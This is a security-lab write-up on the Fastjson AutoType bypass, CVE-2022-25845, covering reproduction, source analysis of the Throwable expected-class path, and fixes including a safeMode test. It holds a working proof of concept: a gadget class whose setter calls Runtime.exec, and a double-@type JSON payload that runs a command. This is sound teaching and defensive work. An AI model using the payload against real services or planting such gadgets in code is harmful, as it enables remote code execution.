Fastjson code execution cve-2022-25845
2022-07-22 16:35:00 [Hetian Network Security Laboratory]
Vulnerability profile
Fastjson code execution vulnerability (CVE-2022-25845). It lets an attacker bypass Fastjson's AutoType check and achieve remote code execution, even with AutoType left at its default (disabled) setting, by routing the payload through a class that extends Throwable.
Affected versions: 1.2.80 and earlier, i.e. <= 1.2.80 (fixed in 1.2.83)
Vulnerability reproduction
We use IDEA to create a Maven project as the vulnerable environment and add the following dependency to pom.xml. Pin 1.2.80, the last affected release (the affected range above is <= 1.2.80), so the reproduction matches the version being analysed:
```xml
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <!-- last affected release; 1.2.83 contains the fix -->
    <version>1.2.80</version>
</dependency>
```
Create the package com.example.fastjson
and add the two Java files below.
```java
package com.example.fastjson;

import java.io.IOException;

// Gadget class for the PoC. It extends Throwable (through Exception) so that
// fastjson hands it to ThrowableDeserializer, and its public setter executes
// the attacker-controlled string. This is intentionally dangerous code.
public class Poc extends Exception {
    public void setName(String str) {
        try {
            Runtime.getRuntime().exec(str);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
```
```java
package com.example.fastjson;

import com.alibaba.fastjson.JSON;

public class PocDemo {
    public static void main(String[] args) {
        // Two "@type" keys: the first (java.lang.Exception) selects
        // ThrowableDeserializer, the second is resolved inside that deserializer
        // with Throwable as the expected class; "name" then reaches Poc.setName.
        String json = "{\"@type\":\"java.lang.Exception\",\"@type\":\"com.example.fastjson.Poc\",\"name\":\"calc\"}";
        JSON.parse(json);
    }
}
```
Run PocDemo: the command in the name field is executed (on Windows, calc opens the calculator).
Vulnerability analysis
AutoType
Since fastjson 1.2.25, autoType is disabled by default. When autoType is enabled, fastjson relies on a built-in blacklist for safety, which carries the risk of blacklist bypasses. When autoType is disabled, fastjson resolves types against a whitelist instead. This vulnerability is exploited with autoType disabled, i.e. in the default configuration.
With autoType disabled and only a whitelist in play, code execution is hard to reach, so we need a way around the default deny policy of the AutoType check in order to load a class of our choosing.
Whether autoType is on or off, type names from "@type" end up in config.checkAutoType:
com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class<?>, int)
This method holds the blacklist. The entries are not stored as class names but as 64-bit hash values written in hexadecimal; the decoded class names can be looked up in the fastjson-blacklist project.
Throwable
We notice that
com.alibaba.fastjson.parser.deserializer.ThrowableDeserializer#deserialze
also calls
checkAutoType
and that it does so with Throwable.class as the expected class. checkAutoType treats an expected class specially: a type name that is not on the blacklist is loaded and accepted as long as the loaded class is assignable to the expected class, and this branch is taken even when autoType is disabled. At the same time,
com.alibaba.fastjson.parser.ParserConfig#getDeserializer(java.lang.Class<?>, java.lang.reflect.Type)
checks whether the target class extends Throwable and, if it does, routes the object to
ThrowableDeserializer.deserialize()
Preliminary conclusion: if the target class extends Throwable, it can be loaded and instantiated much as it would be with autoType enabled. The reach is limited to Throwable subclasses, not arbitrary classes, but within that set the choice of class is the attacker's.
To test this conjecture, change Poc to extend Error instead of Exception:
```java
package com.example.fastjson;

import java.io.IOException;

// Same gadget as before, now extending Error: still a Throwable, so it still
// goes through ThrowableDeserializer.
public class Poc extends Error {
    public void setName(String str) {
        try {
            Runtime.getRuntime().exec(str);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
```
The payload still fires, so the conjecture holds: any Throwable subclass works, not only Exception.
Continuing in ThrowableDeserializer#deserialze: once the class is resolved, it calls
com.alibaba.fastjson.parser.deserializer.ThrowableDeserializer#createException
to instantiate the exception object (through a public constructor taking message and cause, message only, or no arguments). It then obtains a JavaBeanDeserializer for the resolved class through
com.alibaba.fastjson.parser.ParserConfig#getDeserializer(java.lang.Class<?>, java.lang.reflect.Type)
and uses its field deserializers to apply every remaining JSON key (here name) to the new object via the matching setter. That setter call is where setName, and with it Runtime.exec, runs.
This completes the vulnerability analysis.
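The following harness, an added example that is not part of the original write-up or of fastjson itself, makes the expectClass behaviour described above observable without spawning a process. It assumes fastjson 1.2.80 or earlier on the classpath with default settings (autoType disabled). The gadget classes, their names and the "probe" value are hypothetical; each gadget only records that its setter ran.

```java
package com.example.fastjson;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;

// Added example, not the original PoC. Assumes fastjson <= 1.2.80 with
// autoType disabled (the default). Gadget classes are hypothetical and only
// record the setter call, so the probe is safe to run repeatedly.
public class ExpectClassProbe {

    // Extends Throwable: reachable through the expectClass path in checkAutoType.
    public static class ThrowableGadget extends Exception {
        static volatile String lastName;
        public void setName(String name) { lastName = name; }
    }

    // Identical setter, but not a Throwable: the expectClass path does not apply.
    public static class PlainGadget {
        static volatile String lastName;
        public void setName(String name) { lastName = name; }
    }

    // Double-@type payload shape from the PoC: the first @type routes the object
    // to ThrowableDeserializer, the second is resolved with expectClass = Throwable.
    static String wrapped(Class<?> target) {
        return "{\"@type\":\"java.lang.Exception\",\"@type\":\"" + target.getName()
                + "\",\"name\":\"probe\"}";
    }

    // Plain @type without the Throwable wrapper, for comparison.
    static String direct(Class<?> target) {
        return "{\"@type\":\"" + target.getName() + "\",\"name\":\"probe\"}";
    }

    static String attempt(String label, String json) {
        try {
            JSON.parse(json);
            return label + ": parsed";
        } catch (JSONException e) {
            return label + ": rejected -> " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        // Expected on a vulnerable build: the direct form is refused
        // ("autoType is not support"), the wrapped Throwable form is accepted and
        // its setter runs, and the wrapped non-Throwable form is refused because
        // the loaded class is not assignable to Throwable.
        // Order matters: run the direct case first, because fastjson caches a
        // class name once checkAutoType has accepted it.
        System.out.println(attempt("direct Throwable", direct(ThrowableGadget.class)));
        System.out.println(attempt("wrapped Throwable", wrapped(ThrowableGadget.class)));
        System.out.println("    ThrowableGadget.setName called with: " + ThrowableGadget.lastName);
        System.out.println(attempt("wrapped non-Throwable", wrapped(PlainGadget.class)));
        System.out.println("    PlainGadget.setName called with: " + PlainGadget.lastName);
    }
}
```

The non-Throwable case is the useful control: it shows that the bypass is not a general autoType hole but specifically the expectClass branch that ThrowableDeserializer opens, which is why the exploit needs a Throwable subclass with a dangerous setter.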
Fix
The vendor offers four remediation options:
● Upgrade to 1.2.83, the release that fixes this issue
● safeMode hardening (safeMode disables autoType entirely, including the expected-class path; it is enabled with ParserConfig.getGlobalInstance().setSafeMode(true) or the JVM property -Dfastjson.parser.safeMode=true)
● Upgrade to fastjson v2
● Use the noneautotype build
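The following check, an added example that is not part of the original post, applies the safeMode option from the list above and confirms that the PoC payload is refused before any class named in @type is loaded. It assumes fastjson 1.2.68 or later (where safeMode exists); the payload reuses the PoC's own class name.

```java
package com.example.fastjson;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

// Added example, not from the original post. Assumes fastjson >= 1.2.68
// (safeMode available). The payload is the PoC's own double-@type document.
public class SafeModeCheck {

    static final String PAYLOAD =
            "{\"@type\":\"java.lang.Exception\",\"@type\":\"com.example.fastjson.Poc\","
            + "\"name\":\"calc\"}";

    // Returns true only if parsing is refused by the safeMode check itself,
    // i.e. before the first @type name is resolved to a class.
    static boolean refusedBySafeMode(String json) {
        try {
            JSON.parse(json);
            return false;
        } catch (JSONException e) {
            return e.getMessage() != null && e.getMessage().contains("safeMode");
        }
    }

    public static void main(String[] args) {
        // Programmatic equivalent of starting the JVM with
        // -Dfastjson.parser.safeMode=true; both fully disable autoType.
        ParserConfig.getGlobalInstance().setSafeMode(true);

        System.out.println("PoC payload refused under safeMode: " + refusedBySafeMode(PAYLOAD));

        // Ordinary JSON without @type keeps working under safeMode, which is why
        // this option is usually deployable without code changes.
        System.out.println("plain object still parses: "
                + JSON.parseObject("{\"name\":\"ok\"}").getString("name"));
    }
}
```

Prefer the JVM property in production so the setting cannot be forgotten by a code path that builds its own ParserConfig; the programmatic call is convenient for tests such as this one.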
Summary and reflection
The analysis of this vulnerability took a lot of time. Following the reference article CVE-2022-25845 – Analyzing the Fastjson "Auto Type Bypass" RCE vulnerability, it still took a long time of setting breakpoints and stepping back and forth. To summarize: with AutoType disabled (the default), Fastjson resolves external classes against a whitelist. Searching for callers of checkAutoType
turns up the call in ThrowableDeserializer#deserialze.
It is not the only caller, but it is one that can be taken further: a class that extends Throwable
passes the check, is instantiated, and then has its setters invoked, which yields code execution. In real scenarios, however, exploitation is more demanding: the target class must extend Throwable
and must also expose a dangerous setter.